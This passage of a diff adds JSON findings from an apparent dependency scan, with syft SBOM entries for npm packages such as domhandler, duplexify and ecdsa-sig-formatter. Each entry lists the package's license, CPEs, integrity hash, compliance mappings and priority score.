}, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "21e3025ed99f3f28", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: domhandler 5.0.3", + "title": "domhandler 5.0.3", + "description": "Package discovered: domhandler 5.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "952037d890bc80f6", + "name": "domhandler", + "version": "5.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-2-Clause", + "spdxExpression": "BSD-2-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/domhandler@5.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", + "integrity": "sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", + "dependencies": { + "domelementtype": "^2.3.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d6dff11bd10e354b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: domutils 3.2.2", + "title": "domutils 3.2.2", + "description": "Package discovered: domutils 3.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1b9db533b6297450", + "name": "domutils", + "version": "3.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-2-Clause", + "spdxExpression": "BSD-2-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/domutils@3.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz", + "integrity": "sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==", + "dependencies": { + "dom-serializer": "^2.0.0", + "domelementtype": "^2.3.0", + "domhandler": "^5.0.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4726026d0ba78a1e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dunder-proto 1.0.1", + "title": "dunder-proto 1.0.1", + "description": "Package discovered: dunder-proto 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "23d9641db70f3051", + "name": "dunder-proto", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dunder-proto@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eae177c358a69822", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: duplexify 4.1.3", + "title": "duplexify 4.1.3", + "description": "Package discovered: duplexify 4.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "91c59a4a431b283f", + "name": "duplexify", + "version": "4.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/duplexify@4.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz", + "integrity": "sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d3b8cfaa5ee0e8d1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: eastasianwidth 0.2.0", + "title": "eastasianwidth 0.2.0", + "description": "Package discovered: eastasianwidth 0.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e7e9dd6a07994e54", + "name": "eastasianwidth", + "version": "0.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/eastasianwidth@0.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", + "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cb63ab5ab6733afe", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ecdsa-sig-formatter 1.0.11", + "title": "ecdsa-sig-formatter 1.0.11", + "description": "Package discovered: ecdsa-sig-formatter 1.0.11", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4ed0ded14e893339", + "name": "ecdsa-sig-formatter", + "version": "1.0.11", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ecdsa-sig-formatter@1.0.11", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz", + "integrity": "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==", + "dependencies": { + "safe-buffer": "^5.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3d3ef9aed82705e2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: editorconfig 1.0.7", + "title": "editorconfig 1.0.7", + "description": "Package discovered: editorconfig 1.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "122ede063714b5b3", + "name": "editorconfig", + "version": "1.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/editorconfig@1.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz", + "integrity": "sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw==", + "dependencies": { + "@one-ini/wasm": "0.1.1", + "commander": "^10.0.0", + "minimatch": "^9.0.1", + "semver": "^7.5.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9669afa378e5a35f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ee-first 1.1.1", + "title": "ee-first 1.1.1", + "description": "Package discovered: ee-first 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e40c9e2062507e8a", + "name": "ee-first", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ee-first@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "integrity": "sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "04d3ce47ab6baf5d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: electron-to-chromium 1.5.345", + "title": "electron-to-chromium 1.5.345", + "description": "Package discovered: electron-to-chromium 1.5.345", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": 